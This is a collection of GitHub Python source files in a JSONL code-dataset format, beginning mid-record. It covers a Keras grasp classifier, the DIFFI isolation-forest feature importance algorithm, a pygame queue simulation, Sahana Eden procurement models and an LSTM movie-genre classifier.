확장한다.\r\n# ex) config.gpu_options.per_process_gpu_memory_fraction = 0.6: 전체 GPU소모량을 정하고 싶을때\r\nsession = tf.compat.v1.Session(config=config) #세션 셜정\r\n\r\nresult = []\r\n\r\nfolder = [\"All\"]\r\n# folder = [\"Finger\", \"Hand\", \"Angle\", \"Effort\", \"All\"]\r\nnormalization = [\"Normalization\"]\r\n# normalization = [\"Standard\", \"Minmax\", \"Robust\", \"Normalization\"]\r\n\r\ndefalut = \"D:/Classification/Barrett_Hand_codes\"\r\n\r\nfor f, number in enumerate(range(len(folder))): \r\n for i, title in enumerate(range(len(normalization))):\r\n X_train, X_test, y_train, y_test = np.load(defalut + '/dataset/dataset_%s_%s.npy'%(folder[number], normalization[title])) #데이터 셋 로딩\r\n\r\n categories = [\"ball\", \"banana\", \"can\",\"cube\",\"pear\",\"spam\",\"strawberry\",\"tennis\"]\r\n nb_classes = len(categories)\r\n \r\n X_train = X_train.astype(float) / 255 #X 데이터는 흑백으로 구성되어 있음. 0~255의 값을 0~1의 값으로 Nomalize\r\n X_test = X_test.astype(float) / 255\r\n \r\n #print(device_lib.list_local_devices())\r\n \r\n with K.tf_ops.device('/device:CPU:0'):\r\n model = Sequential() #선형 모델\r\n model.add(Conv2D(32, (3,3), padding=\"same\", input_shape=X_train.shape[1:], activation='relu'))\r\n #conv2D(컨볼루션 필터 수, 컨볼루션 커널의 수, 입력형태(샘플 수 제외), 활성화 함수)\r\n # model.add(MaxPooling2D(pool_size=(2,2))) # 차원에 대한 Downsampling 수행\r\n model.add(Dropout(0.2)) #Overfitting 을 방지하기 위한 Dropout\r\n \r\n model.add(Conv2D(64, (3,3), padding=\"same\", activation='relu'))\r\n model.add(MaxPooling2D(pool_size=(2,2)))\r\n model.add(Dropout(0.2))\r\n \r\n # model.add(Conv2D(128, (3,3), padding=\"same\", activation='relu'))\r\n model.add(Conv2D(128, (3,3), padding=\"same\", activation='relu'))\r\n model.add(MaxPooling2D(pool_size=(2,2)))\r\n model.add(Dropout(0.2))\r\n \r\n # model.add(Conv2D(256, (3,3), padding=\"same\", activation='relu'))\r\n # model.add(MaxPooling2D(pool_size=(2,2)))\r\n # model.add(Dropout(0.4))\r\n \r\n model.add(Flatten()) \r\n \r\n model.add(Dense(256, activation='relu')) #은닉 계층\r\n model.add(Dropout(0.4))\r\n model.add(Dense(nb_classes, activation='softmax')) \r\n \r\n model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\r\n \r\n model_path = defalut + '/models/model_%s_%s.model'%(folder[number], normalization[title])\r\n checkpoint = ModelCheckpoint(filepath=model_path , monitor='val_loss', verbose=1, save_best_only=True)\r\n #verbose : 해당 함수의 진행 사항의 출력 여부\r\n #save_best_only : 모델의 정확도가 최고값을 갱신했을때만 저장\r\n early_stopping = EarlyStopping(monitor='val_loss', patience=10)\r\n #최고 성능의 모델이 찾아졌을 경우 학습 중단. ex: epochs = 100 pa tience = 10, 100번 학습할동안 6번 이내로 찾아내지 못하면 중단\r\n \r\n model.summary()\r\n \r\n #모델 학습시키기\r\n history = model.fit(X_train, y_train, batch_size=64, epochs=10, \r\n #validation_data=(X_test, y_test), callbacks=[checkpoint])\r\n validation_data=(X_test, y_test), callbacks=[checkpoint, early_stopping])\r\n \r\n result.append(folder[number] + \"_\" + normalization[title] + \" : \" + \"%.4f\"% (model.evaluate(X_test, y_test)[1]))\r\n #print(\"정확도 : %.4f\" % (model.evaluate(X_test, y_test)[1]))#모델 평가하기\r\n \r\n acc = history.history['accuracy']\r\n val_acc = history.history['val_accuracy']\r\n loss = history.history['loss']\r\n val_loss = history.history['val_loss']\r\n \r\n epochs = range(1, len(acc) + 1)\r\n \r\n plt.plot(epochs, loss, 'b', label = 'Training loss')\r\n plt.plot(epochs, val_loss, 'r', label = 'Validation loss')\r\n \r\n plt.plot(epochs, acc, 'y', label = 'T Acc')\r\n plt.plot(epochs, val_acc, 'g', label = 'V acc')\r\n \r\n plt.title(folder[number] + \"_\" + normalization[title] + \" : \" + \"%.4f\"% (model.evaluate(X_test, y_test)[1]))\r\n plt.legend(loc = 'best')\r\n plt.figure(figsize=(16,10))\r\n plt.show()\r\n \r\nfor pp in range(0, 4):\r\n print(result[pp])","repo_name":"LEEYUN-JU/Hand-data-model-","sub_path":"Hand_data_model/Barrett_Hand_model_make.py","file_name":"Barrett_Hand_model_make.py","file_ext":"py","file_size_in_byte":5170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"11545535485","text":"import numpy as np\nfrom sklearn.ensemble._iforest import _average_path_length\n\n# epsilon as defined in the original paper\n_EPSILON = 1e-2\n\ndef diffi_score(forest, X, inlier_samples=\"auto\"):\n \"\"\"\n Depth-based Isolation Forest Feature Importance (DIFFI) Algorithm [1].\n\n Return the feature importance for every feature of a given isolation forest.\n\n Parameters\n ----------\n X : numpy.ndarray of shape (n_samples, n_features)\n The input samples.\n\n inlier_samples : 'auto', 'all' or int, default='auto'\n The amount of inlier samples to consider when computing importance coefficient.\n - If 'auto', use the same amount of outliers found.\n - If 'all', use the all the inliers in the dataset.\n - If int, the contamination should be in the range [0, 0.5].\n\n Returns\n -------\n fi : numpy.ndarray of shape (n_features,)\n Array with the inportance of each feature.\n\n References\n ----------\n .. [1] Carletti, Mattia, Chiara Masiero, Alessandro Beghi, and Gian Antonio Susto.\n \"Explainable machine learning in industry 4.0: evaluating feature importance in anomaly detection to enable root cause analysis.\"\n IEEE International Conference on Systems, Man and Cybernetics (SMC), pp. 21-26. IEEE, 2019.\n \"\"\"\n\n pred = forest.predict(X)\n X_out = X[pred < 0]\n X_in = X[pred > 0]\n\n if inlier_samples == \"all\":\n k = X_in.shape[0]\n elif inlier_samples == \"auto\":\n k = X_out.shape[0]\n else:\n k = int(inlier_samples)\n if k < X_in.shape[0]:\n X_in = X_in[np.random.choice(X_in.shape[0], k, replace=False), :]\n\n return (_mean_cumulative_importance(forest, X_out) /\n _mean_cumulative_importance(forest, X_in))\n\n\ndef _mean_cumulative_importance(forest, X):\n '''\n Computes mean cumulative importance for every feature of given forest on dataset X\n '''\n\n f_importance = np.zeros(X.shape[1])\n f_count = np.zeros(X.shape[1])\n\n if forest._max_features == X.shape[1]:\n subsample_features = False\n else:\n subsample_features = True\n\n for tree, features in zip(forest.estimators_, forest.estimators_features_):\n X_subset = X[:, features] if subsample_features else X\n\n importance_t, count_t = _cumulative_ic(tree, X_subset)\n\n if subsample_features:\n f_importance[features] += importance_t\n f_count[features] += count_t\n else:\n f_importance += importance_t\n f_count += count_t\n\n return f_importance / f_count\n\n\ndef _cumulative_ic(tree, X):\n '''\n Computes importance and count for every feature of given tree on dataset X\n '''\n importance = np.zeros(X.shape[1])\n count = np.zeros(X.shape[1])\n\n node_indicator = tree.decision_path(X)\n node_loads = np.array(node_indicator.sum(axis=0)).reshape(-1)\n # depth is number of edges in path, same as number of nodes in path -1\n depth = np.array(node_indicator.sum(axis=1), dtype=float).reshape(-1) - 1\n # when the tree is pruned (i.e. more than one instance at the leaf)\n # we consider the average path length to adjust depth\n leaves_index = tree.apply(X)\n depth += _average_path_length(node_loads[leaves_index])\n\n iic = _induced_imbalance_coeff(tree, X, node_loads)\n rows, cols = node_indicator.nonzero()\n for i, j in zip(rows, cols):\n f = tree.tree_.feature[j]\n # ignore leaf nodes\n if f < 0:\n continue\n count[f] += 1\n importance[f] += iic[j] / depth[i]\n\n return importance, count\n\ndef _induced_imbalance_coeff(tree, X, node_loads):\n '''\n Computes imbalance coefficient for every *node* of a tree on dataset X\n '''\n iic = np.zeros_like(node_loads)\n for i in range(len(iic)):\n # ignore leaf nodes\n if tree.tree_.children_left[i] < 0:\n continue\n n_left = node_loads[tree.tree_.children_left[i]]\n n_right = node_loads[tree.tree_.children_right[i]]\n if n_left == 0 or n_right == 0:\n iic[i] = _EPSILON\n continue\n if n_left == 1 or n_right == 1:\n iic[i] = 1\n continue\n iic[i] = max(n_left, n_right) / node_loads[i]\n return iic\n","repo_name":"britojr/diffi","sub_path":"diffi/diffi.py","file_name":"diffi.py","file_ext":"py","file_size_in_byte":4235,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"66"} +{"seq_id":"35894508879","text":"import pygame\nfrom pygame.locals import *\nfrom actor import Actor, Neighbourhood, Shop\nfrom app0 import *\nfrom random import randint\nimport helper\nfrom math import sin, cos, pi, radians\n\npygame.init()\nscreen = pygame.display.set_mode([1400,800])\nclock = pygame.time.Clock()\n\ntick = 0\nhour = 0\n\nrunning = True\n\n\n\ndef graph(screen,x,y,xScale,yScale,data,limit):\n\n cols = [(255,0,0),(0,255,0),(0,0,255),(255,0,255)]\n\n if len(data[0])==0:\n pygame.draw.line(screen,(255,255,255),(x,y),(x,y - (yScale*20)))\n elif max(data[0])<20:\n pygame.draw.line(screen,(255,255,255),(x,y),(x,y - (yScale*20)))\n else:\n pygame.draw.line(screen,(255,255,255),(x,y),(x,y - (yScale*max(data[0]))))\n\n pygame.draw.line(screen,(255,255,255),(x,y),(x+(24*6*xScale),y))\n\n pygame.draw.line(screen,(255,0,0),(x,y-(yScale*limit)),(x+(24*6*xScale),y-(yScale*limit)))\n\n for j in range(0,len(data)):\n for i in range(0,len(data[j])-1):\n point =data[j][i]\n nextPoint = data[j][i+1]\n col = (0,255,0)\n pygame.draw.line(screen,cols[j],(x+int(i*xScale),y-int(point*yScale)),(x+int((i+1)*xScale),y-int(nextPoint*yScale)),1)\n\n\nactors,hood = helper.setup(64)\n\nwhile running:\n for event in pygame.event.get():\n if event.type == QUIT:\n running = False\n screen.fill((0,0,0))\n\n\n #Update all actor states every 10 ticks\n if tick%10==0:\n print(\"\\t\",str(int(hour))+\":\"+str(int(hour%1 * 60))+\"\\t\"+str(tick))\n for i in actors:\n i.run(hour,hood,[blind,block])\n \n for shop in hood.shops:\n shop.run(hour,tick)\n\n #Draw all actors\n for i in actors:\n i.draw(screen,tick%10)\n for i in hood.shops:\n i.draw(screen)\n\n #Draw graph\n alldata = []\n for i in hood.shops: alldata.append(i.historicQueue)\n\n xScale = 5/3.\n yScale = 5\n graph(screen,800,800,xScale,yScale,alldata,hood.shops[0].throughput)\n\n #Draw clock\n centre = [750,100]\n pygame.draw.circle(screen,(255,255,255),centre,40,2)\n theta = radians(tick/2)\n #hour hand\n length = 20\n endX = centre[0] + (length * sin(theta))\n endY = centre[1] - (length * cos(theta))\n pygame.draw.line(screen,(255,255,255),centre,[endX,endY],3)\n #minute hand\n phi = radians(tick*6)\n length2 = 30\n endX = centre[0] + (length2 * sin(phi))\n endY = centre[1] - (length2 * cos(phi))\n pygame.draw.line(screen,(255,255,255),centre,[endX,endY],1)\n\n \"\"\"\n for i in range(0,2):\n xScale = 5/3.\n yScale = 5\n graph(screen,1100,200+(25*yScale + 100)*i,xScale,yScale,hood.shops[i+2].historicQueue,hood.shops[i+2].throughput)\n\"\"\"\n\n pygame.display.update()\n clock.tick(30)\n tick += 1\n hour = (tick/60)%24\n","repo_name":"smross106/covid-queue-simulation","sub_path":"display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":2755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74809439891","text":"__all__ = (\"ProcurementPlansModel\",\n \"PurchaseOrdersModel\",\n \"proc_rheader\"\n )\n\nfrom gluon import *\nfrom gluon.storage import Storage\nfrom ..s3 import *\n#from .supply import SupplyItemPackQuantity\n\n# =============================================================================\nclass ProcurementPlansModel(S3Model):\n \"\"\"\n Procurement Plans\n\n @ToDo: Link Table to Projects\n \"\"\"\n\n names = (\"proc_plan\",\n \"proc_plan_item\"\n )\n\n def model(self):\n\n T = current.T\n db = current.db\n auth = current.auth\n\n crud_strings = current.response.s3.crud_strings\n define_table = self.define_table\n #messages = current.messages\n configure = self.configure\n settings = current.deployment_settings\n\n SITE_LABEL = settings.get_org_site_label()\n\n # =====================================================================\n # Planned Procurements\n #\n proc_shipping_opts = {0: NONE,\n 1: T(\"Air\"),\n 2: T(\"Rail\"),\n 3: T(\"Road\"),\n 4: T(\"Sea\")\n }\n\n tablename = \"proc_plan\"\n define_table(tablename,\n self.super_link(\"site_id\", \"org_site\",\n label = SITE_LABEL,\n default = auth.user.site_id if auth.is_logged_in() else None,\n readable = True,\n writable = True,\n empty = False,\n # Comment these to use a Dropdown & not an Autocomplete\n #widget = S3SiteAutocompleteWidget(),\n #comment = DIV(_class=\"tooltip\",\n # _title=\"%s|%s\" % (T(\"Inventory\"),\n # messages.AUTOCOMPLETE_HELP)),\n represent = self.org_site_represent,\n ),\n s3_date(\"order_date\",\n label = T(\"Order Date\")\n ),\n s3_date(\"eta\",\n label = T(\"Date Expected\"),\n ),\n # @ToDo: Do we want more than 1 supplier per Plan?\n # @ToDo: Filter to orgs of type 'supplier'\n self.org_organisation_id(label = T(\"Supplier\")),\n Field(\"shipping\", \"integer\",\n requires = IS_EMPTY_OR(IS_IN_SET(proc_shipping_opts)),\n represent = s3_options_represent(proc_shipping_opts),\n label = T(\"Shipping Method\"),\n default = 0,\n ),\n # @ToDo: Add estimated shipping costs\n s3_comments(),\n *s3_meta_fields())\n\n # CRUD strings\n crud_strings[tablename] = Storage(\n label_create = T(\"Create Procurement Plan\"),\n title_display = T(\"Procurement Plan Details\"),\n title_list = T(\"Procurement Plans\"),\n title_update = T(\"Edit Procurement Plan\"),\n label_list_button = T(\"List Procurement Plans\"),\n label_delete_button = T(\"Delete Procurement Plan\"),\n msg_record_created = T(\"Procurement Plan added\"),\n msg_record_modified = T(\"Procurement Plan updated\"),\n msg_record_deleted = T(\"Procurement Plan deleted\"),\n msg_list_empty = T(\"No Procurement Plans currently registered\"))\n\n # ---------------------------------------------------------------------\n # Redirect to the Items tabs after creation\n plan_item_url = URL(f=\"plan\", args=[\"[id]\", \"plan_item\"])\n configure(tablename,\n # @ToDo: Move these to controller r.interactive?\n create_next = plan_item_url,\n update_next = plan_item_url,\n )\n\n proc_plan_represent = self.proc_plan_represent\n plan_id = S3ReusableField(\"plan_id\", \"reference %s\" % tablename,\n sortby = \"date\",\n requires = IS_EMPTY_OR(\n IS_ONE_OF(db, \"proc_plan.id\",\n proc_plan_represent,\n orderby=\"proc_plan.date\",\n sort=True)),\n represent = proc_plan_represent,\n label = T(\"Procurement Plan\"),\n ondelete = \"CASCADE\",\n )\n\n # Items as a component of Plans\n self.add_components(tablename,\n proc_plan_item = \"plan_id\",\n )\n\n # =====================================================================\n # Procurement Plan Items\n #\n tablename = \"proc_plan_item\"\n define_table(tablename,\n plan_id(),\n self.supply_item_entity_id(),\n self.supply_item_id(),\n self.supply_item_pack_id(),\n Field(\"quantity\", \"double\", notnull = True,\n label = T(\"Quantity\"),\n ),\n # @ToDo: Move this into a Currency Widget\n # for the pack_value field\n s3_currency(readable=False,\n writable=False\n ),\n Field(\"pack_value\", \"double\",\n label = T(\"Value per Pack\"),\n readable = False,\n writable = False,\n ),\n #Field(\"pack_quantity\",\n # \"double\",\n # compute = record_pack_quantity), # defined in supply\n #Field.Method(\"pack_quantity\",\n # SupplyItemPackQuantity(tablename)),\n s3_comments(),\n *s3_meta_fields())\n\n # CRUD strings\n crud_strings[tablename] = Storage(\n label_create = T(\"Add Item to Procurement Plan\"),\n title_display = T(\"Procurement Plan Item Details\"),\n title_list = T(\"Items in Procurement Plan\"),\n title_update = T(\"Edit Procurement Plan Item\"),\n label_list_button = T(\"List Items in Procurement Plan\"),\n label_delete_button = T(\"Remove Item from Procurement Plan\"),\n msg_record_created = T(\"Item added to Procurement Plan\"),\n msg_record_modified = T(\"Procurement Plan Item updated\"),\n msg_record_deleted = T(\"Item removed from Procurement Plan\"),\n msg_list_empty = T(\"No Items currently registered in this Procurement Plan\"))\n\n # ---------------------------------------------------------------------\n # Item Search Method\n #\n filter_widgets = [\n S3TextFilter([\"item_id$name\",\n #\"item_id$category_id$name\",\n #\"plan_id$site_id$name\"\n ],\n label = T(\"Search\"),\n comment = T(\"Search for an item by text.\"),\n ),\n S3OptionsFilter(\"plan_id$organisation_id$name\",\n label = T(\"Supplier\"),\n comment = T(\"If none are selected, then all are searched.\"),\n cols = 2,\n hidden = True,\n ),\n #S3OptionsFilter(\"plan_id$site_id\",\n # label = T(\"Facility\"),\n # represent = \"%(name)s\",\n # comment = T(\"If none are selected, then all are searched.\"),\n # cols = 2,\n # hidden = True,\n # ),\n #S3DateFilter(\"plan_id$order_date\",\n # label=T(\"Order Date\"),\n # hidden = True,\n # ),\n #S3DateFilter(\"plan_id$eta\",\n # label = T(\"Date Expected\"),\n # hidden = True,\n # ),\n ]\n\n configure(tablename,\n super_entity = \"supply_item_entity\",\n filter_widgets = filter_widgets,\n #report_groupby = db.proc_plan.site_id,\n report_hide_comments = True,\n )\n\n # ---------------------------------------------------------------------\n # Pass names back to global scope (s3.*)\n #\n return None\n\n # -------------------------------------------------------------------------\n @staticmethod\n def proc_plan_represent(plan_id, row=None):\n \"\"\"\n Represent a Procurement Plan\n \"\"\"\n\n if row:\n table = current.db.proc_plan\n elif not plan_id:\n return NONE\n else:\n db = current.db\n table = db.proc_plan\n row = db(table.id == plan_id).select(table.site_id,\n table.order_date,\n limitby = (0, 1),\n ).first()\n try:\n return \"%s (%s)\" % (table.site_id.represent(row.site_id),\n table.order_date.represent(row.order_date))\n except AttributeError:\n # Plan not found\n return current.messages.UNKNOWN_OPT\n\n# =============================================================================\nclass PurchaseOrdersModel(S3Model):\n \"\"\"\n Purchase Orders (PO)\n\n @ToDo: Link to inv_send\n @ToDo: Link to inv_req\n \"\"\"\n\n names = (\"proc_order\",\n \"proc_order_item\"\n \"proc_order_tag\"\n )\n\n def model(self):\n\n T = current.T\n db = current.db\n auth = current.auth\n\n crud_strings = current.response.s3.crud_strings\n define_table = self.define_table\n #messages = current.messages\n configure = self.configure\n settings = current.deployment_settings\n\n SITE_LABEL = settings.get_org_site_label()\n string_represent = lambda s: s if s else NONE\n purchase_ref = S3ReusableField(\"purchase_ref\",\n label = T(\"%(PO)s Number\") % \\\n {\"PO\": settings.get_proc_shortname()},\n represent = string_represent,\n )\n\n # =====================================================================\n # Purchase Orders\n #\n\n tablename = \"proc_order\"\n define_table(tablename,\n purchase_ref(),\n self.super_link(\"site_id\", \"org_site\",\n label = SITE_LABEL,\n default = auth.user.site_id if auth.is_logged_in() else None,\n readable = True,\n writable = True,\n #empty = False,\n # Comment these to use a Dropdown & not an Autocomplete\n #widget = S3SiteAutocompleteWidget(),\n #comment = DIV(_class=\"tooltip\",\n # _title=\"%s|%s\" % (T(\"Inventory\"),\n # messages.AUTOCOMPLETE_HELP)),\n represent = self.org_site_represent,\n ),\n s3_date(default = \"now\"),\n s3_comments(),\n *s3_meta_fields())\n\n # CRUD strings\n crud_strings[tablename] = Storage(\n label_create = T(\"Create Purchase Order\"),\n title_display = T(\"Purchase Order Details\"),\n title_list = T(\"Purchase Orders\"),\n title_update = T(\"Edit Purchase Order\"),\n label_list_button = T(\"List Purchase Orders\"),\n label_delete_button = T(\"Delete Purchase Order\"),\n msg_record_created = T(\"Purchase Order added\"),\n msg_record_modified = T(\"Purchase Order updated\"),\n msg_record_deleted = T(\"Purchase Order deleted\"),\n msg_list_empty = T(\"No Purchase Orders currently registered\"))\n\n # ---------------------------------------------------------------------\n # Redirect to the Items tabs after creation\n order_item_url = URL(f=\"order\", args=[\"[id]\", \"order_item\"])\n configure(tablename,\n create_onaccept = self.proc_order_onaccept,\n # @ToDo: Move these to controller r.interactive?\n create_next = order_item_url,\n update_next = order_item_url,\n )\n\n proc_order_represent = S3Represent(lookup = tablename,\n fields = [\"purchase_ref\"],\n )\n order_id = S3ReusableField(\"order_id\", \"reference %s\" % tablename,\n sortby = \"date\",\n requires = IS_EMPTY_OR(\n IS_ONE_OF(db, \"proc_order.id\",\n proc_order_represent,\n orderby=\"proc_order.date\",\n sort=True)),\n represent = proc_order_represent,\n label = T(\"Purchase Order\"),\n ondelete = \"CASCADE\",\n )\n\n # Items as a component of Plans\n self.add_components(tablename,\n proc_order_item = \"order_id\",\n proc_order_tag = {\"name\": \"tag\",\n \"joinby\": \"order_id\",\n },\n )\n\n # =====================================================================\n # Purchase Order Items\n #\n tablename = \"proc_order_item\"\n define_table(tablename,\n order_id(),\n self.supply_item_entity_id(),\n self.supply_item_id(),\n self.supply_item_pack_id(),\n Field(\"quantity\", \"double\", notnull = True,\n label = T(\"Quantity\"),\n ),\n # @ToDo: Move this into a Currency Widget\n # for the pack_value field\n s3_currency(readable=False,\n writable=False\n ),\n Field(\"pack_value\", \"double\",\n label = T(\"Value per Pack\"),\n readable = False,\n writable = False,\n ),\n #Field.Method(\"pack_quantity\",\n # SupplyItemPackQuantity(tablename)),\n s3_comments(),\n *s3_meta_fields())\n\n # CRUD strings\n crud_strings[tablename] = Storage(\n label_create = T(\"Add Item to Purchase Order\"),\n title_display = T(\"Purchase Order Item Details\"),\n title_list = T(\"Items in Purchase Order\"),\n title_update = T(\"Edit Purchase Order Item\"),\n label_list_button = T(\"List Items in Purchase Order\"),\n label_delete_button = T(\"Remove Item from Purchase Order\"),\n msg_record_created = T(\"Item added to Purchase Order\"),\n msg_record_modified = T(\"Purchase Order Item updated\"),\n msg_record_deleted = T(\"Item removed from Purchase Order\"),\n msg_list_empty = T(\"No Items currently registered in this Purchase Order\"))\n\n # ---------------------------------------------------------------------\n # Item Search Method\n #\n filter_widgets = [\n S3TextFilter([\"item_id$name\",\n #\"item_id$category_id$name\",\n #\"order_id$site_id$name\"\n ],\n label = T(\"Search\"),\n comment = T(\"Search for an item by text.\"),\n ),\n S3OptionsFilter(\"order_id$organisation_id$name\",\n label = T(\"Supplier\"),\n comment = T(\"If none are selected, then all are searched.\"),\n cols = 2,\n hidden = True,\n ),\n #S3OptionsFilter(\"order_id$site_id\",\n # label = T(\"Facility\"),\n # represent =\"%(name)s\",\n # comment = T(\"If none are selected, then all are searched.\"),\n # cols = 2,\n # hidden = True,\n # ),\n #S3DateFilter(\"order_id$order_date\",\n # label = T(\"Order Date\"),\n # hidden = True,\n # ),\n ]\n\n configure(tablename,\n super_entity = \"supply_item_entity\",\n filter_widgets = filter_widgets,\n #report_groupby = db.proc_order.site_id,\n report_hide_comments = True,\n )\n\n # ---------------------------------------------------------------------\n # Purchase Order Tags\n # - Key-Value extensions\n # - can be used to provide conversions to external systems\n # - can be a Triple Store for Semantic Web support\n #\n tablename = \"proc_order_tag\"\n define_table(tablename,\n order_id(),\n # key is a reserved word in MySQL\n Field(\"tag\",\n label = T(\"Key\"),\n ),\n Field(\"value\",\n label = T(\"Value\"),\n ),\n s3_comments(),\n *s3_meta_fields())\n\n configure(tablename,\n deduplicate = S3Duplicate(primary = (\"order_id\",\n \"tag\",\n ),\n ),\n )\n\n # ---------------------------------------------------------------------\n # Pass names back to global scope (s3.*)\n #\n return {\"proc_order_id\": order_id,\n }\n\n # -------------------------------------------------------------------------\n def defaults(self):\n \"\"\"\n Safe defaults for model-global names in case module is disabled\n \"\"\"\n\n return {\"proc_order_id\": S3ReusableField.dummy(\"order_id\"),\n }\n\n # -------------------------------------------------------------------------\n @staticmethod\n def proc_order_onaccept(form):\n \"\"\"\n When a proc_order record is created then create the purchase_ref.\n \"\"\"\n\n db = current.db\n table = db.proc_order\n # If the purchase_ref is None then set it up\n record_id = form.vars.id\n record = table[record_id]\n if not record.purchase_ref:\n # PO Number\n code = current.s3db.supply_get_shipping_code(\n current.deployment_settings.get_proc_shortname(),\n record.site_id,\n table.purchase_ref,\n )\n db(table.id == record_id).update(purchase_ref = code)\n\n# =============================================================================\ndef proc_rheader(r):\n \"\"\" Resource Header for Procurements \"\"\"\n\n rheader = None\n\n if r.representation == \"html\":\n record = r.record\n if record:\n tablename = r.tablename\n if tablename == \"proc_order\":\n T = current.T\n\n tabs = [(T(\"Edit Details\"), None),\n (T(\"Items\"), \"order_item\"),\n ]\n rheader_tabs = s3_rheader_tabs(r, tabs)\n\n table = r.table\n\n rheader = DIV(TABLE(TR(TH(\"%s: \" % table.purchase_ref.label),\n record.purchase_ref,\n ),\n TR(TH(\"%s: \" % table.site_id.label),\n table.site_id.represent(record.site_id),\n ),\n TR(TH(\"%s: \" % table.date.label),\n table.date.represent(record.date),\n ),\n ),\n rheader_tabs\n )\n\n elif tablename == \"proc_plan\":\n T = current.T\n\n tabs = [(T(\"Edit Details\"), None),\n (T(\"Items\"), \"plan_item\"),\n ]\n rheader_tabs = s3_rheader_tabs(r, tabs)\n\n table = r.table\n\n rheader = DIV(TABLE(TR(TH(\"%s: \" % table.site_id.label),\n table.site_id.represent(record.site_id),\n ),\n TR(TH(\"%s: \" % table.order_date.label),\n table.order_date.represent(record.order_date),\n ),\n TR(TH(\"%s: \" % table.eta.label),\n table.eta.represent(record.eta),\n ),\n TR(TH(\"%s: \" % table.shipping.label),\n table.shipping.represent(record.shipping),\n ),\n ),\n rheader_tabs\n )\n return rheader\n\n# END =========================================================================\n","repo_name":"sahana/eden","sub_path":"modules/s3db/proc.py","file_name":"proc.py","file_ext":"py","file_size_in_byte":23139,"program_lang":"python","lang":"en","doc_type":"code","stars":376,"dataset":"github-code","pt":"66"} +{"seq_id":"1292740430","text":"import json\n\nwith open('148.json') as jsonfile:\n art = json.load(jsonfile)\n print(art['dimension'])\n\nprint()\n\nme = {'first_name': 'Kenneth', 'last_name': 'Love', 'topic': 'Python'}\nhim = {'first_name': 'Craig', 'last_name': 'Dennis', 'topic': 'Java'}\n# print(str(me))\n# print(json.dumps(me))\n\n# with open('teachers.json', 'a') as teacher_file:\n# json.dump([me, him], teacher_file)\n\nwith open('teachers.json') as teachers_file:\n teachers = json.load(teachers_file)\n print(teachers)\n","repo_name":"raulgiron/TTH-Python","sub_path":"art.py","file_name":"art.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"19860059095","text":"import pandas as pd\nimport numpy as np\nimport nltk\nfrom nltk.corpus import stopwords\nfrom sklearn.model_selection import train_test_split\nfrom keras.datasets import imdb\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import LSTM\nfrom keras.layers.embeddings import Embedding\nfrom keras.preprocessing import sequence\nimport os\n\ndef preprocessOverview(text):\n # tokenize text and set to lower case\n tokens = [x.strip().lower() for x in nltk.word_tokenize(text)]\n\n # get stopwords from nltk, remove them from our list as well as all punctuations and numbers\n stop_words = stopwords.words('english')\n output = [word for word in tokens if (word not in stop_words and word.isalpha())]\n\n return \" \".join(output)\n\n\ndef sentences_to_indices(X, word_to_index, max_len):\n\n # number of training examples\n m = X.shape[0]\n\n # Initialize X_indices as a numpy matrix of zeros and the correct shape (~ 1 line)\n X_indices = np.zeros((m, max_len))\n\n # loop over training examples\n for i in range(m):\n\n # Convert the ith training sentence in lower case and split is into words -> get a list of words.\n sentence_words = [x.lower() for x in X[i].split()]\n\n # Initialize j to 0\n j = 0\n\n # Loop over the words in sentence_words\n for w in sentence_words:\n\n # check that the word is within our GloVe dataset, otherwise pass\n if w in word_to_index.keys():\n # Set the (i,j)th entry of X_indices to the index of the correct word.\n X_indices[i, j] = word_to_index[w]\n\n # Increment j to j + 1\n j = j + 1\n else:\n pass\n\n return X_indices\n\ndef read_glove_vecs_only_alpha(glove_file):\n with open(glove_file, 'r', encoding='utf8') as f:\n\n words = set()\n word_to_vec_map = {}\n\n for line in f:\n line = line.strip().split()\n curr_word = line[0]\n\n # only consider words containing alphabetical letters\n if curr_word.isalpha():\n words.add(curr_word)\n word_to_vec_map[curr_word] = np.array(line[1:], dtype=np.float64)\n\n i = 1\n words_to_index = {}\n index_to_words = {}\n\n for w in sorted(words):\n words_to_index[w] = i\n index_to_words[i] = w\n i = i + 1\n\n return words_to_index, index_to_words, word_to_vec_map\n\n\n\n\ndf = pd.read_csv('train.csv', low_memory=False)\nmax_sequence_length = df[\"overview length\"].max()\ndf = df.drop(['imdb_id', 'title','overview','overview length','genres','labels_index'], axis = 1)\ndf[\"features_content\"] = df[\"features_content\"].astype(str).apply(lambda x: preprocessOverview(x))\n\nY = df[df.columns[2:]]\nword_to_index, index_to_word, word_to_vec_map = read_glove_vecs_only_alpha('glove.6B.100d.txt')\n\nX = df['features_content']\nX_indices = sentences_to_indices(X, word_to_index, max_sequence_length)\n\n\nxtrain, xval, ytrain, yval = train_test_split(X_indices, Y, test_size=0.2, random_state=9)\n\ntop_words = 500\n\nx_train = sequence.pad_sequences(xtrain, maxlen=max_sequence_length)\nx_val = sequence.pad_sequences(xval, maxlen=max_sequence_length)\n\n\nembedding_vecor_length = 32\nmodel = Sequential()\nmodel.add(Embedding(top_words, embedding_vecor_length, input_length=max_sequence_length))\nmodel.add(LSTM(100))\nmodel.add(Dense(20, activation='sigmoid'))\nmodel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\nmodel.fit(x_train, ytrain, epochs=20, batch_size=64)\n\n\nscores = model.evaluate(x_val, yval, verbose=0)\nprint(\"Accuracy: %.2f%%\" % (scores[1]*100))\n\n\n\nmodel_json = model.to_json()\nwith open(r\"C:\\Users\\dasan\\Desktop\\P726(2)\\model_LSTM.json\", \"w+\") as json_file:\n json_file.write(model_json)\n# serialize weights to HDF5\nmodel.save_weights(r\"C:\\Users\\dasan\\Desktop\\P726(2)\\model_LSTM.h5\")\n","repo_name":"thenatzzz/Movie_Genre_Classification_Deeplearning","sub_path":"Algorithm2-3-LSTM-RF/LSTM+Sigmoid_Model/LSTM_model.py","file_name":"LSTM_model.py","file_ext":"py","file_size_in_byte":3895,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} 